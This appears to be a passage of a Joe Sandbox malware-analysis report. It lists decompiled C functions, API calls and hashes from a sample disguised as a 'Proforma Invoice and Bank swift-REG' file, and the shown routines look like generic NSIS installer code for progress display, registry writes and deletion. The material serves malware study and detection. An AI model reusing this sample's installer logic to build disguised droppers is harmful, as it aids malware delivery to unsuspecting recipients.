Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004047e1
0x004047ee
0x004047f4
0x00404832
0x00404832
0x00404841
0x00404848
0x00000000
0x0040484a
0x004047f6
0x00404805
0x0040480d
0x00404810
0x00404822
0x00404828
0x0040482f
0x00000000
0x0040482f
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
GetMessagePos.USER32 ref: 004047F6
ScreenToClient.USER32 ref: 00404810
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848

Strings

f, xrefs: 00404824

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b48
0x00402b56
0x00402b5c
0x00402b5c
0x00402b6a
0x00402b6c
0x00402b78
0x00402b7d
0x00402b7f
0x00402b7f
0x00402b8a
0x00402b9a
0x00402bac
0x00402bac
0x00402bb4

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
wsprintfA.USER32 ref: 00402B8A
SetWindowTextA.USER32(?,?), ref: 00402B9A
SetDlgItemTextA.USER32 ref: 00402BAC

Strings

unpacking data: %d%%, xrefs: 00402B78, 00402B88
verifying installer: %d%%, xrefs: 00402B7F

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99

Uniqueness

Uniqueness Score: -1.00%

Function 6F7322F1, Relevance: 9.1, APIs: 6, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6F7322F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E6F7312AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E6F73123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M6F73247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E6F7312FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E6F7312FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E6F731224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x6f73405c =  *0x6f73405c +  *0x6f73405c;
									__edi = GlobalAlloc(0x40,  *0x6f73405c +  *0x6f73405c);
									 *0x6f73405c = MultiByteToWideChar(0, 0, __ebx,  *0x6f73405c, __edi,  *0x6f73405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E6F7312FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x6f73405c;
									__esi = __esi +  *0x6f734064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E6F731429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E6F731224(0x6f734034);
					goto L10;
				}
			}

0x6f732306
0x6f73230a
0x6f732315
0x6f732315
0x6f73231c
0x6f732321
0x00000000
0x00000000
0x6f732325
0x6f732328
0x00000000
0x00000000
0x6f73232d
0x6f732338
0x6f732348
0x6f73233f
0x6f732341
0x6f732357
0x6f732357
0x00000000
0x6f73232f
0x6f73232f
0x6f732358
0x6f73235c
0x6f73235e
0x6f73235e
0x6f732361
0x6f732361
0x6f732369
0x6f73236c
0x6f732373
0x6f732377
0x6f732446
0x6f732447
0x6f732452
0x6f73247d
0x6f73247d
0x6f732462
0x6f73246e
0x6f732464
0x6f732464
0x6f732464
0x00000000
0x6f73237d
0x6f73237d
0x00000000
0x6f732384
0x00000000
0x00000000
0x6f73238d
0x00000000
0x00000000
0x6f73239b
0x6f73239e
0x00000000
0x00000000
0x6f7323a7
0x6f7323ac
0x6f7323af
0x6f7323b0
0x00000000
0x00000000
0x6f7323bd
0x6f7323c8
0x6f7323d7
0x6f7323e2
0x6f732405
0x6f732408
0x6f7323e4
0x6f7323e8
0x6f7323ee
0x6f7323ef
0x6f7323f2
0x6f7323f3
0x6f7323f6
0x6f7323fd
0x6f7323fd
0x00000000
0x00000000
0x6f732410
0x6f732413
0x6f73241f
0x6f732421
0x00000000
0x00000000
0x6f732424
0x6f732427
0x6f732428
0x6f73242f
0x6f732436
0x6f732439
0x6f73243b
0x6f73243e
0x00000000
0x00000000
0x6f73237d
0x6f732377
0x6f73234d
0x6f732352
0x00000000
0x6f732352

APIs

GlobalFree.KERNEL32 ref: 6F732447

Part of subcall function 6F731224: lstrcpynA.KERNEL32(00000000,?,6F7312CF,-6F73404B,6F7311AB,-000000A0), ref: 6F731234

GlobalAlloc.KERNEL32(00000040,?), ref: 6F7323C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6F7323D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6F7323E8
CLSIDFromString.OLE32(00000000,00000000), ref: 6F7323F6
GlobalFree.KERNEL32 ref: 6F7323FD

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 6bdea94d3e3fa44f8b3b7316efd88d445db6b875b1b048deacb654ff25851675
Instruction ID: 50f2c57cfdcdd3a0e8b450f0f5b902dc6795644c353c674a3505b5707e13d3b0
Opcode Fuzzy Hash: 6bdea94d3e3fa44f8b3b7316efd88d445db6b875b1b048deacb654ff25851675
Instruction Fuzzy Hash: DE41A0B3E08324FFD7208F249A44B6AB7E8FF41311F1149AEE555CA192D770A954CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x00402304
0x00402309
0x00402313
0x0040231d
0x00402320
0x00402330
0x0040233a
0x00402341
0x00402349
0x00402357
0x0040235b
0x00402366
0x00402366
0x0040236a
0x0040236e
0x00402374
0x00402379
0x00402379
0x0040237d
0x00402389
0x00402389
0x004023a2
0x004023a4
0x004023a4
0x004023a7
0x0040247d
0x0040247d
0x0040288e
0x0040289a

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp24F7.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsp24F7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsp24F7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D

Strings

C:\Users\user\AppData\Local\Temp\nsp24F7.tmp, xrefs: 00402352, 00402360, 00402374, 00402384, 0040238F

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp24F7.tmp
API String ID: 1356686001-4180749453
Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669

Uniqueness

Uniqueness Score: -1.00%

Function 6F731837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6F731837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x6f73405c = _a8;
				_t77 = 0;
				 *0x6f734060 = _a16;
				_v12 = 0;
				_v8 = E6F73123B();
				_t90 = E6F7312FE(_t42);
				_t87 = _t85;
				_t81 = E6F73123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E6F73123B();
					_t77 = E6F7312FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E6F731429(_t85, _t90, _t87,  &_v52);
								E6F731266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E6F732EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E6F732F10(_t59, _t83, _t85);
						} else {
							_t48 = E6F732F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E6F732D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E6F732E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E6F732D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x6f731837
0x6f731841
0x6f73184a
0x6f73184d
0x6f731852
0x6f73185b
0x6f731864
0x6f731866
0x6f73186d
0x6f73186f
0x6f731872
0x6f731876
0x6f731882
0x6f73188b
0x6f731890
0x6f731893
0x6f731899
0x6f731899
0x6f73189c
0x6f73189f
0x6f7318a2
0x6f731968
0x6f731968
0x6f73196b
0x6f7319e5
0x6f7319e9
0x6f7319f8
0x6f7319fb
0x6f731a03
0x6f731a03
0x6f731a03
0x6f731a05
0x6f731a05
0x6f731a06
0x6f731a06
0x6f731a08
0x6f731a0a
0x6f731a10
0x6f731a19
0x6f731a2a
0x6f731a35
0x6f731a35
0x6f7319fd
0x6f7319e0
0x6f7319e0
0x6f7319e2
0x6f7319e2
0x00000000
0x6f7319e2
0x6f7319ff
0x6f731a01
0x00000000
0x00000000
0x00000000
0x6f731a01
0x6f7319ed
0x6f7319f1
0x00000000
0x6f7319f1
0x6f73196d
0x6f73196d
0x6f73196e
0x6f7319d7
0x6f7319d9
0x00000000
0x00000000
0x6f7319db
0x6f7319de
0x00000000
0x00000000
0x00000000
0x6f7319de
0x6f731970
0x6f731970
0x6f731971
0x6f7319aa
0x6f7319ae
0x6f7319ca
0x6f7319cd
0x00000000
0x00000000
0x6f7319cf
0x00000000
0x00000000
0x6f7319d1
0x6f7319d3
0x00000000
0x00000000
0x00000000
0x6f7319d5
0x6f7319b0
0x6f7319b4
0x6f7319b6
0x6f7319b8
0x6f7319ba
0x6f7319c3
0x6f7319bc
0x6f7319bc
0x6f7319bc
0x00000000
0x6f7319ba
0x6f731973
0x6f731973
0x6f731976
0x6f7319a3
0x6f7319a5
0x00000000
0x6f7319a5
0x6f731978
0x6f731978
0x6f73197b
0x6f73198b
0x6f73198f
0x6f73199c
0x6f73199e
0x00000000
0x6f73199e
0x6f731991
0x6f731993
0x00000000
0x00000000
0x6f731995
0x6f731998
0x00000000
0x00000000
0x00000000
0x6f73199a
0x6f73197e
0x6f73197f
0x6f731985
0x6f731987
0x6f731987
0x00000000
0x6f73197f
0x6f7318a8
0x6f731920
0x6f731922
0x6f731925
0x6f731943
0x6f731946
0x6f73194c
0x6f731951
0x6f731927
0x6f731927
0x6f73192b
0x6f73192f
0x6f731931
0x6f731931
0x6f731954
0x6f731957
0x00000000
0x6f73195d
0x6f73195d
0x6f731960
0x00000000
0x6f731960
0x6f731957
0x6f7318aa
0x6f7318ad
0x6f731911
0x6f731913
0x6f731915
0x00000000
0x00000000
0x00000000
0x6f73191b
0x6f7318af
0x6f7318b2
0x00000000
0x00000000
0x6f7318b4
0x6f7318b5
0x6f7318eb
0x6f7318ef
0x6f731907
0x6f731909
0x00000000
0x6f731909
0x6f7318f1
0x6f7318f3
0x00000000
0x00000000
0x6f7318f9
0x6f7318fc
0x00000000
0x00000000
0x00000000
0x6f731902
0x6f7318b7
0x6f7318ba
0x6f7318e1
0x00000000
0x6f7318bc
0x6f7318bc
0x6f7318bd
0x6f7318d1
0x6f7318d3
0x6f7318bf
0x6f7318c1
0x6f7318c7
0x6f7318c9
0x6f7318c9
0x6f7318c1
0x00000000
0x6f7318bd

APIs

GlobalFree.KERNEL32 ref: 6F731893
GlobalFree.KERNEL32 ref: 6F731A2A
GlobalFree.KERNEL32 ref: 6F731A2F

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: e17e4f7ffec92230f283ce1d589040155e9a4300f365523d3aae04875fcbeb4d
Instruction ID: 1b4db384b7991d991b7fe242d394bf9b4e4dae695b12fd124ff9e3910dc9515d
Opcode Fuzzy Hash: e17e4f7ffec92230f283ce1d589040155e9a4300f365523d3aae04875fcbeb4d
Instruction Fuzzy Hash: BF510773D481B8BEDB108FB8CB449ADBBB5AF4635AF05417BD400A7147C6F1794187A2

Uniqueness

Uniqueness Score: -1.00%

Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a57
0x00402a5f
0x00402a87
0x00402a71
0x00402ac1
0x00402ac7
0x00000000
0x00402ac9
0x00402a85
0x00000000
0x00000000
0x00402a85
0x00402a9c
0x00402aa4
0x00402aab
0x00402ad7
0x00000000
0x00000000
0x00402adf
0x00402ae7
0x00000000
0x00000000
0x00000000
0x00402ae7
0x00000000
0x00402aba
0x00402ace

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
RegCloseKey.ADVAPI32(?), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AC1
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
